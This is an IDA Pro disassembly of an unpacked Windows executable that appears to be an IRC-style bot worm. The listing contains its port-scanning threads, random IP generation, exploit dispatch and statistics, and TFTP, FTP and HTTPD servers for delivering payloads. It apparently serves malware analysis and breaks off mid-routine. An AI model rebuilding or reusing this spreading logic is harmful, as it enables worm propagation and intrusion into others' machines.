;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : C2450BFB2E868CC4FA72ECFD51377CFD
; File Name : u:\work\c2450bfb2e868cc4fa72ecfd51377cfd_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0001D8C4 ( 121028.)
; Section size in file : 0001D8C4 ( 121028.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_4078FA+4834�p
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push edi
lea eax, [ebp+var_200]
push offset aScanExploitSta ; "[SCAN]: Exploit Statistics:"
push eax
xor ebx, ebx
call sub_412BB5
cmp dword_42A068, ebx
pop ecx
pop ecx
mov edi, 200h
jz short loc_40106E
push esi
mov esi, offset dword_42A070
loc_401033: ; CODE XREF: sub_401000+6B�j
mov eax, [esi]
push eax
add ebx, eax
lea eax, [esi-26h]
push eax
lea eax, [ebp+var_400]
push offset aSD ; " %s: %d,"
push eax
call sub_412BB5
push edi
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+var_200]
push eax
call sub_412A80
add esi, 3Ch
add esp, 1Ch
cmp dword ptr [esi-8], 0
jnz short loc_401033
pop esi
loc_40106E: ; CODE XREF: sub_401000+2B�j
push dword_479BB0
call sub_40FD16
push eax
push ebx
lea eax, [ebp+var_400]
push offset aTotalDInS_ ; " Total: %d in %s."
push eax
call sub_412BB5
push edi
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+var_200]
push eax
call sub_412A80
push 0
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
lea eax, [ebp+var_200]
push eax
call sub_401C33
add esp, 38h
pop edi
pop ebx
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010CA proc near ; CODE XREF: sub_4078FA+4154�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push 9
call sub_4110DA
test eax, eax
pop ecx
jle short loc_401106
mov eax, [ebp+arg_C]
push dword_42D700[eax*8]
call dword_433520
push eax
lea eax, [ebp+var_200]
push offset aScanCurrentIpS ; "[SCAN]: Current IP: %s."
push eax
call sub_412BB5
add esp, 0Ch
jmp short loc_401119
; ---------------------------------------------------------------------------
loc_401106: ; CODE XREF: sub_4010CA+13�j
lea eax, [ebp+var_200]
push offset aScanScanNotAct ; "[SCAN]: Scan not active."
push eax
call sub_412BB5
pop ecx
pop ecx
loc_401119: ; CODE XREF: sub_4010CA+3A�j
push 0
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
lea eax, [ebp+var_200]
push eax
call sub_401C33
add esp, 18h
leave
retn
sub_4010CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401141 proc near ; CODE XREF: sub_4018D1+52�p
var_204 = byte ptr -204h
var_4 = byte ptr -4
arg_94 = byte ptr 9Ch
arg_114 = byte ptr 11Ch
arg_194 = dword ptr 19Ch
arg_1B4 = dword ptr 1BCh
arg_1BC = dword ptr 1C4h
arg_1C0 = dword ptr 1C8h
push ebp
mov ebp, esp
sub esp, 204h
mov eax, [ebp+arg_1B4]
cmp eax, 0FFFFFFFFh
jz locret_4014F1
imul eax, 3Ch
push ebx
xor ebx, ebx
cmp dword_42A074[eax], ebx
push esi
jz loc_4013DF
push 5
call sub_4110DA
test eax, eax
pop ecx
jnz loc_4014EF
mov eax, dword_42AE44
push edi
push 104h
mov edi, offset dword_42ED14
push edi
push ebx
mov dword_42EF24, eax
mov dword_42EF20, ebx
call ds:dword_41F010
push 103h
push offset byte_42AED0
mov esi, offset dword_42EE18
push esi
call sub_412C40
mov eax, [ebp+arg_194]
add esp, 0Ch
cmp [ebp+arg_114], bl
mov dword_42ED10, eax
mov eax, [ebp+arg_1BC]
mov dword_42EFA8, eax
push 7Fh
jnz short loc_4011F4
lea eax, [ebp+arg_94]
push eax
push offset dword_42EF28
call sub_412C40
mov dword_42EFAC, 1
jmp short loc_40120B
; ---------------------------------------------------------------------------
loc_4011F4: ; CODE XREF: sub_401141+94�j
lea eax, [ebp+arg_114]
push eax
push offset dword_42EF28
call sub_412C40
mov dword_42EFAC, ebx
loc_40120B: ; CODE XREF: sub_401141+B1�j
add esp, 0Ch
push esi
push edi
push dword_42EF24
lea eax, [ebp+var_204]
push offset aTftpServerStar ; "[TFTP]: Server started on Port: %d, Fil"...
push eax
call sub_412BB5
push ebx
lea eax, [ebp+var_204]
push 5
push eax
call sub_410EEA
add esp, 20h
mov dword_42EF1C, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_42ED10
push offset sub_410A22
push ebx
push ebx
call ds:dword_41F00C
mov ecx, dword_42EF1C
imul ecx, 234h
cmp eax, ebx
mov dword_43434C[ecx], eax
jnz loc_401327
call ds:dword_41F008
push eax
lea eax, [ebp+var_204]
push offset aTftpFailedToSt ; "[TFTP]: Failed to start server, error: "...
push eax
call sub_412BB5
add esp, 0Ch
loc_40128A: ; CODE XREF: sub_401141+1EE�j
lea eax, [ebp+var_204]
push eax
call sub_401C33
pop ecx
call ds:dword_41F004
xor edx, edx
mov ecx, 0F82Fh
div ecx
push 104h
mov edi, offset dword_42EA6C
push edi
push ebx
mov dword_42EC78, ebx
add edx, 400h
mov dword_42EC7C, edx
call ds:dword_41F010
push 103h
push offset byte_42AED0
mov esi, offset dword_42EB70
push esi
call sub_412C40
mov eax, [ebp+arg_194]
add esp, 0Ch
cmp [ebp+arg_114], bl
mov dword_42EA68, eax
mov eax, [ebp+arg_1BC]
mov dword_42ED00, eax
push 7Fh
jnz short loc_401334
lea eax, [ebp+arg_94]
push eax
push offset dword_42EC80
call sub_412C40
mov dword_42ED04, 1
jmp short loc_40134B
; ---------------------------------------------------------------------------
loc_40131F: ; CODE XREF: sub_401141+1EC�j
push 32h
call ds:dword_41F000
loc_401327: ; CODE XREF: sub_401141+128�j
cmp dword_42EFB0, ebx
jz short loc_40131F
jmp loc_40128A
; ---------------------------------------------------------------------------
loc_401334: ; CODE XREF: sub_401141+1BF�j
lea eax, [ebp+arg_114]
push eax
push offset dword_42EC80
call sub_412C40
mov dword_42ED04, ebx
loc_40134B: ; CODE XREF: sub_401141+1DC�j
add esp, 0Ch
push esi
push edi
push dword_42EC7C
push dword_42EA68
call sub_406C33
pop ecx
push eax
lea eax, [ebp+var_204]
push offset aFtpServerStart ; "[FTP]: Server started on: %s:%d, File: "...
push eax
call sub_412BB5
push ebx
lea eax, [ebp+var_204]
push 6
push eax
call sub_410EEA
add esp, 24h
mov dword_42EC74, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_42EA68
push offset sub_402B1D
push ebx
push ebx
call ds:dword_41F00C
mov ecx, dword_42EC74
imul ecx, 234h
cmp eax, ebx
mov dword_43434C[ecx], eax
pop edi
jnz short loc_4013D2
call ds:dword_41F008
push eax
push offset aFtpFailedToSta ; "[FTP]: Failed to start server, error: <"...
jmp loc_4014D3
; ---------------------------------------------------------------------------
loc_4013CA: ; CODE XREF: sub_401141+297�j
push 32h
call ds:dword_41F000
loc_4013D2: ; CODE XREF: sub_401141+276�j
cmp dword_42ED08, ebx
jz short loc_4013CA
jmp loc_4014E2
; ---------------------------------------------------------------------------
loc_4013DF: ; CODE XREF: sub_401141+25�j
cmp dword_42A078[eax], ebx
jz loc_4014EF
push 4
call sub_4110DA
test eax, eax
pop ecx
jnz loc_4014EF
push 104h
mov esi, offset dword_42E944
push esi
push ebx
call ds:dword_41F010
push 5Ch
push esi
call sub_412C10
cmp eax, ebx
pop ecx
pop ecx
jz short loc_40141D
mov [eax], bl
loc_40141D: ; CODE XREF: sub_401141+2D8�j
mov eax, dword_42AE48
mov dword_42EA48, eax
lea eax, [ebp+arg_94]
push eax
push offset dword_42E6BC
mov dword_42EA5C, ebx
call sub_412BB5
mov eax, [ebp+arg_194]
pop ecx
pop ecx
mov ecx, [ebp+arg_1BC]
push esi
push dword_42EA48
mov dword_42EA54, ecx
mov ecx, [ebp+arg_1C0]
push eax
mov dword_42E6B8, eax
mov dword_42EA58, ecx
call sub_406C33
pop ecx
push eax
lea eax, [ebp+var_204]
push offset aHttpdServerLis ; "[HTTPD]: Server listening on IP: %s:%d,"...
push eax
call sub_412BB5
push ebx
lea eax, [ebp+var_204]
push 4
push eax
call sub_410EEA
add esp, 20h
loc_401495: ; DATA XREF: .data:off_42BB98�o
; .data:off_42C450�o
mov dword_42EA50, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_42E6B8
push offset sub_403E06
push ebx
push ebx
call ds:dword_41F00C
mov ecx, dword_42EA50
imul ecx, 234h
cmp eax, ebx
mov dword_43434C[ecx], eax
jnz short loc_4014FB
call ds:dword_41F008
push eax
push offset aHttpdFailedToS ; "[HTTPD]: Failed to start server, error:"...
loc_4014D3: ; CODE XREF: sub_401141+284�j
lea eax, [ebp+var_204]
push eax
call sub_412BB5
add esp, 0Ch
loc_4014E2: ; CODE XREF: sub_401141+299�j
; sub_401141+3C2�j
lea eax, [ebp+var_204]
push eax
call sub_401C33
pop ecx
loc_4014EF: ; CODE XREF: sub_401141+35�j
; sub_401141+2A4�j ...
pop esi
pop ebx
locret_4014F1: ; CODE XREF: sub_401141+12�j
leave
retn
; ---------------------------------------------------------------------------
loc_4014F3: ; CODE XREF: sub_401141+3C0�j
push 32h
call ds:dword_41F000
loc_4014FB: ; CODE XREF: sub_401141+384�j
cmp dword_42EA64, ebx
jz short loc_4014F3
jmp short loc_4014E2
sub_401141 endp
; =============== S U B R O U T I N E =======================================
sub_401505 proc near ; CODE XREF: sub_40169B:loc_4016FD�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
lea esi, ds:42D700h[esi*8]
push dword ptr [esi]
call dword_433570
inc eax
push eax
call dword_4335C4
mov [esi], eax
pop esi
retn
sub_401505 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401525 proc near ; CODE XREF: sub_40169B+5A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
push edi
or edi, 0FFFFFFFFh
mov [ebp+var_4], edi
mov [ebp+var_C], edi
mov [ebp+var_8], edi
mov [ebp+var_10], edi
lea ecx, [eax+1]
loc_401541: ; CODE XREF: sub_401525+21�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401541
sub eax, ecx
cmp eax, 0Fh
jbe short loc_401556
xor eax, eax
jmp loc_4015FB
; ---------------------------------------------------------------------------
loc_401556: ; CODE XREF: sub_401525+28�j
push esi
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push [ebp+arg_0]
call sub_412D93
add esp, 18h
cmp [ebp+var_4], edi
jnz short loc_4015A0
call sub_412D71
mov esi, 0FFh
jmp short loc_40158D
; ---------------------------------------------------------------------------
loc_401588: ; CODE XREF: sub_401525+79�j
call sub_412D71
loc_40158D: ; CODE XREF: sub_401525+61�j
cdq
mov ecx, esi
idiv ecx
push edx
mov [ebp+var_4], edx
call sub_41013C
test al, al
pop ecx
jnz short loc_401588
loc_4015A0: ; CODE XREF: sub_401525+55�j
cmp [ebp+var_C], edi
mov esi, 100h
jnz short loc_4015B7
call sub_412D71
cdq
mov ecx, esi
idiv ecx
mov [ebp+var_C], edx
loc_4015B7: ; CODE XREF: sub_401525+83�j
cmp [ebp+var_8], edi
jnz short loc_4015C7
call sub_412D71
cdq
idiv esi
mov [ebp+var_8], edx
loc_4015C7: ; CODE XREF: sub_401525+95�j
mov edx, [ebp+var_10]
cmp edx, edi
pop esi
jnz short loc_4015DD
call sub_412D71
cdq
mov ecx, 0FEh
idiv ecx
inc edx
loc_4015DD: ; CODE XREF: sub_401525+A8�j
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
shl edx, 8
add edx, [ebp+var_8]
shl edx, 8
add edx, [ebp+var_C]
shl edx, 8
add eax, edx
mov dword_42D700[ecx*8], eax
loc_4015FB: ; CODE XREF: sub_401525+2C�j
pop edi
leave
retn
sub_401525 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4015FE proc near ; CODE XREF: sub_40169B+A9�p
; sub_4028A8+2C�p
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
xor edi, edi
xor ebx, ebx
push ebx
inc edi
push edi
push 2
mov [ebp+var_4], edi
call dword_4334A0
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_401627
xor eax, eax
jmp short loc_401696
; ---------------------------------------------------------------------------
loc_401627: ; CODE XREF: sub_4015FE+23�j
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call dword_4335EC
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call dword_433444
push 10h
lea eax, [ebp+var_1C]
push eax
push esi
call dword_433458
mov eax, [ebp+arg_8]
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
push ebx
lea eax, [ebp+var_120]
push eax
push ebx
push ebx
mov [ebp+var_8], ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call dword_433544
push esi
mov edi, eax
call dword_4335AC
xor eax, eax
cmp edi, ebx
setnle al
loc_401696: ; CODE XREF: sub_4015FE+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_4015FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40169B proc near ; DATA XREF: sub_4018D1+144�o
var_3B0 = dword ptr -3B0h
var_394 = dword ptr -394h
var_390 = byte ptr -390h
var_380 = byte ptr -380h
var_300 = dword ptr -300h
var_2FC = byte ptr -2FCh
var_27C = byte ptr -27Ch
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_254 = byte ptr -254h
var_1D4 = byte ptr -1D4h
var_1C4 = byte ptr -1C4h
var_144 = dword ptr -144h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 394h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 74h
mov esi, eax
pop ecx
lea edi, [ebp+var_1D4]
rep movsd
mov edi, [ebp+var_2C]
mov dword ptr [eax+1CCh], 1
mov eax, [ebp+var_28]
mov [ebp+var_4], edi
mov [ebp+arg_0], eax
call ds:dword_41F004
push eax
call sub_412D64
mov ebx, edi
pop ecx
imul ebx, 234h
jmp loc_4018AD
; ---------------------------------------------------------------------------
loc_4016E7: ; CODE XREF: sub_40169B+220�j
cmp [ebp+var_10], 0
push eax
jz short loc_4016FD
lea eax, [ebp+var_1D4]
push eax
call sub_401525
pop ecx
jmp short loc_401702
; ---------------------------------------------------------------------------
loc_4016FD: ; CODE XREF: sub_40169B+51�j
call sub_401505
loc_401702: ; CODE XREF: sub_40169B+60�j
pop ecx
push [ebp+arg_0]
mov esi, eax
push dword_43433C[ebx]
push [ebp+var_3C]
push esi
call dword_433520
push eax
lea eax, [ebp+var_254]
push offset aScanIpSDScanTh ; "[SCAN]: IP: %s:%d, Scan thread: %d, Sub"...
push eax
call sub_412BB5
lea eax, [ebp+var_254]
push eax
lea eax, dword_434138[ebx]
push eax
call sub_412BB5
push [ebp+var_38]
push [ebp+var_3C]
push esi
call sub_4015FE
add esp, 2Ch
cmp eax, 1
jnz loc_4018A2
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_4017D6
push offset dword_42E6A0
call ds:dword_41F01C
push [ebp+var_3C]
push esi
call dword_433520
push eax
lea eax, [ebp+var_254]
push offset aScanIpSPortDIs ; "[SCAN]: IP: %s, Port %d is open."
push eax
call sub_412BB5
add esp, 10h
cmp [ebp+var_14], 0
jnz short loc_4017B8
cmp [ebp+var_C0], 0
push 1
push [ebp+var_18]
lea eax, [ebp+var_254]
push eax
lea eax, [ebp+var_C0]
jnz short loc_4017AC
lea eax, [ebp+var_140]
loc_4017AC: ; CODE XREF: sub_40169B+109�j
push eax
push [ebp+var_40]
call sub_4045DD
add esp, 14h
loc_4017B8: ; CODE XREF: sub_40169B+EE�j
lea eax, [ebp+var_254]
push eax
call sub_401C33
mov [esp+3B0h+var_3B0], offset dword_42E6A0
call ds:dword_41F018
jmp loc_4018A2
; ---------------------------------------------------------------------------
loc_4017D6: ; CODE XREF: sub_40169B+BE�j
push esi
call dword_433520
push eax
lea eax, [ebp+var_390]
push eax
call sub_412BB5
mov eax, [ebp+var_20]
imul eax, 3Ch
add eax, offset aWebdav ; "webdav"
push eax
lea eax, [ebp+var_27C]
push eax
call sub_412BB5
add esp, 10h
cmp [ebp+var_C0], 0
lea eax, [ebp+var_C0]
jnz short loc_40181A
lea eax, [ebp+var_140]
loc_40181A: ; CODE XREF: sub_40169B+177�j
push eax
lea eax, [ebp+var_2FC]
push eax
call sub_412BB5
mov eax, [ebp+var_144]
pop ecx
mov [ebp+var_300], eax
pop ecx
xor eax, eax
loc_401837: ; CODE XREF: sub_40169B+1AD�j
mov cl, [ebp+eax+var_1C4]
mov [ebp+eax+var_380], cl
inc eax
test cl, cl
jnz short loc_401837
mov eax, [ebp+var_40]
mov [ebp+var_394], eax
mov eax, [ebp+var_18]
mov [ebp+var_260], eax
mov eax, [ebp+var_14]
mov [ebp+var_25C], eax
mov eax, [ebp+var_3C]
mov [ebp+var_270], eax
mov eax, [ebp+var_20]
mov [ebp+var_268], eax
imul eax, 3Ch
sub esp, 140h
push 50h
pop ecx
mov [ebp+var_26C], edi
lea esi, [ebp+var_394]
mov edi, esp
rep movsd
call off_42A06C[eax]
mov edi, [ebp+var_4]
add esp, 140h
loc_4018A2: ; CODE XREF: sub_40169B+B4�j
; sub_40169B+136�j
push 7D0h
call ds:dword_41F000
loc_4018AD: ; CODE XREF: sub_40169B+47�j
mov eax, dword_43433C[ebx]
cmp dword_42D704[eax*8], 0
jnz loc_4016E7
push edi
call sub_4111AE
pop ecx
push 0
call ds:dword_41F014
int 3 ; Trap to Debugger
sub_40169B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4018D1 proc near ; DATA XREF: sub_4078FA+3C68�o
; sub_4078FA+5643�o
var_304 = dword ptr -304h
var_250 = byte ptr -250h
var_1C0 = dword ptr -1C0h
var_1BC = byte ptr -1BCh
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 250h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 74h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_250]
rep movsd
mov dword ptr [eax+1C8h], 1
lea eax, [ebp+74h+var_250]
push eax
call dword_433514
mov ecx, [ebp+74h+var_AC]
sub esp, 1D0h
mov dword_42D700[ecx*8], eax
push 74h
pop ecx
lea esi, [ebp+74h+var_250]
mov edi, esp
rep movsd
call sub_401141
xor ebx, ebx
add esp, 1D0h
cmp [ebp+74h+var_1C0], ebx
jnz short loc_401943
mov eax, dword_432FF4
mov [ebp+74h+var_1C0], eax
loc_401943: ; CODE XREF: sub_4018D1+65�j
push 9
call sub_4110DA
xor edi, edi
inc edi
cmp eax, edi
pop ecx
jnz short loc_4019B3
mov esi, offset dword_42E6A0
push esi
call ds:dword_41F024
push 80000400h
push esi
call ds:dword_41F020
test eax, eax
jnz short loc_4019B3
lea eax, [ebp+74h+var_80]
push offset aScanFailedToIn ; "[SCAN]: Failed to initialize critical s"...
push eax
call sub_412BB5
cmp [ebp+74h+var_90], ebx
pop ecx
pop ecx
jnz short loc_40199D
push ebx
push [ebp+74h+var_94]
lea eax, [ebp+74h+var_80]
push eax
lea eax, [ebp+74h+var_1BC]
push eax
push [ebp+74h+var_BC]
call sub_4045DD
add esp, 14h
loc_40199D: ; CODE XREF: sub_4018D1+B0�j
lea eax, [ebp+74h+var_80]
push eax
call sub_401C33
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
add ebp, 74h
leave
retn 4
; ---------------------------------------------------------------------------
loc_4019B3: ; CODE XREF: sub_4018D1+7F�j
; sub_4018D1+9B�j
cmp [ebp+74h+var_A0], edi
mov eax, [ebp+74h+var_AC]
mov esi, ds:dword_41F000
mov dword_42D704[eax*8], edi
jb loc_401A64
loc_4019CC: ; CODE XREF: sub_4018D1+18D�j
push edi
push [ebp+74h+var_AC]
lea eax, [ebp+74h+var_250]
push [ebp+74h+var_B8]
mov [ebp+74h+var_A4], edi
push eax
lea eax, [ebp+74h+var_80]
push offset aScanSDScanThre ; "[SCAN]: %s:%d, Scan thread: %d, Sub-thr"...
push eax
call sub_412BB5
push ebx
lea eax, [ebp+74h+var_80]
push 9
push eax
call sub_410EEA
mov ecx, [ebp+74h+var_AC]
mov [ebp+74h+var_A8], eax
imul eax, 234h
add esp, 24h
push ebx
push ebx
mov dword_43433C[eax], ecx
lea eax, [ebp+74h+var_250]
push eax
push offset sub_40169B
push ebx
push ebx
call ds:dword_41F00C
mov ecx, [ebp+74h+var_A8]
imul ecx, 234h
cmp eax, ebx
mov dword_43434C[ecx], eax
jnz short loc_401A7B
call ds:dword_41F008
push eax
lea eax, [ebp+74h+var_80]
push offset aScanFailedToSt ; "[SCAN]: Failed to start worker thread, "...
push eax
call sub_412BB5
lea eax, [ebp+74h+var_80]
push eax
call sub_401C33
add esp, 10h
loc_401A56: ; CODE XREF: sub_4018D1+1AF�j
push 1Eh
call esi
inc edi
cmp edi, [ebp+74h+var_A0]
jbe loc_4019CC
loc_401A64: ; CODE XREF: sub_4018D1+F5�j
cmp [ebp+74h+var_B0], ebx
jz short loc_401A89
mov eax, [ebp+74h+var_B0]
imul eax, 0EA60h
push eax
call esi
jmp short loc_401A96
; ---------------------------------------------------------------------------
loc_401A77: ; CODE XREF: sub_4018D1+1AD�j
push 1Eh
call esi
loc_401A7B: ; CODE XREF: sub_4018D1+162�j
cmp [ebp+74h+var_84], ebx
jz short loc_401A77
jmp short loc_401A56
; ---------------------------------------------------------------------------
loc_401A82: ; CODE XREF: sub_4018D1+1C3�j
push 7D0h
call esi
loc_401A89: ; CODE XREF: sub_4018D1+196�j
mov eax, [ebp+74h+var_AC]
cmp dword_42D704[eax*8], 1
jz short loc_401A82
loc_401A96: ; CODE XREF: sub_4018D1+1A4�j
push [ebp+74h+var_B0]
mov eax, [ebp+74h+var_AC]
push [ebp+74h+var_B8]
mov eax, dword_42D700[eax*8]
push eax
call dword_433520
push eax
lea eax, [ebp+74h+var_80]
push offset aScanFinishedAt ; "[SCAN]: Finished at %s:%d after %d minu"...
push eax
call sub_412BB5
add esp, 14h
cmp [ebp+74h+var_90], ebx
jnz short loc_401ADE
push ebx
push [ebp+74h+var_94]
lea eax, [ebp+74h+var_80]
push eax
lea eax, [ebp+74h+var_1BC]
push eax
push [ebp+74h+var_BC]
call sub_4045DD
add esp, 14h
loc_401ADE: ; CODE XREF: sub_4018D1+1F1�j
lea eax, [ebp+74h+var_80]
push eax
call sub_401C33
mov eax, [ebp+74h+var_AC]
mov dword_42D704[eax*8], ebx
mov [esp+290h+var_304], 0BB8h
call esi
push 9
call sub_4110DA
cmp eax, 1
pop ecx
jnz short loc_401B12
push offset dword_42E6A0
call ds:dword_41F024
loc_401B12: ; CODE XREF: sub_4018D1+234�j
push [ebp+74h+var_AC]
call sub_4111AE
pop ecx
push ebx
call ds:dword_41F014
int 3 ; Trap to Debugger
sub_4018D1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401B23 proc near ; CODE XREF: sub_4078FA+32B1�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
xor ebx, ebx
mov edi, offset dword_479030
loc_401B2D: ; CODE XREF: sub_401B23+4D�j
cmp byte ptr [edi], 0
jz short loc_401B74
mov esi, [esp+0Ch+arg_0]
mov eax, edi
loc_401B38: ; CODE XREF: sub_401B23+31�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_401B5A
test cl, cl
jz short loc_401B56
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_401B5A
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_401B38
loc_401B56: ; CODE XREF: sub_401B23+1F�j
xor eax, eax
jmp short loc_401B5F
; ---------------------------------------------------------------------------
loc_401B5A: ; CODE XREF: sub_401B23+1B�j
; sub_401B23+29�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_401B5F: ; CODE XREF: sub_401B23+35�j
test eax, eax
jz short loc_401B74
add edi, 0B8h
inc ebx
cmp edi, offset dword_479BB0
jl short loc_401B2D
jmp short loc_401BB5
; ---------------------------------------------------------------------------
loc_401B74: ; CODE XREF: sub_401B23+D�j
; sub_401B23+3E�j
mov esi, ebx
imul esi, 0B8h
push 2Eh
pop ecx
push 17h
push [esp+10h+arg_0]
lea edx, dword_479030[esi]
xor eax, eax
mov edi, edx
push edx
rep stosd
call sub_412C40
push 9Fh
push [esp+1Ch+arg_4]
lea eax, dword_479048[esi]
push eax
call sub_412C40
add esp, 18h
inc dword_42B280
loc_401BB5: ; CODE XREF: sub_401B23+4F�j
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_401B23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401BBB proc near ; CODE XREF: sub_4078FA+461E�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset aAliasList ; "-[Alias List]-"
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
xor edi, edi
mov esi, offset dword_479030
loc_401BE5: ; CODE XREF: sub_401BBB+72�j
cmp byte ptr [esi], 0
jz short loc_401C20
lea eax, [esi+18h]
push eax
push esi
push edi
push offset aD_SS ; "%d. %s = %s"
lea eax, [ebp+var_200]
push 200h
push eax
call sub_412E0D
push 1
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 2Ch
loc_401C20: ; CODE XREF: sub_401BBB+2D�j
add esi, 0B8h
inc edi
cmp esi, offset dword_479BB0
jl short loc_401BE5
pop edi
pop esi
leave
retn
sub_401BBB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401C33 proc near ; CODE XREF: sub_401000+BE�p
; sub_4010CA+6D�p ...
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
lea eax, [ebp+var_10]
push eax
call ds:dword_41F028
mov ebx, offset dword_432FB8
mov edi, 80h
mov esi, offset dword_42EFB8
loc_401C55: ; CODE XREF: sub_401C33+3D�j
cmp byte ptr [ebx], 0
jz short loc_401C6C
push 7Fh
lea eax, [ebx+80h]
push ebx
push eax
call sub_412C40
add esp, 0Ch
loc_401C6C: ; CODE XREF: sub_401C33+25�j
sub ebx, edi
cmp ebx, esi
jge short loc_401C55
push [ebp+arg_0]
movzx eax, [ebp+var_4]
push eax
movzx eax, [ebp+var_6]
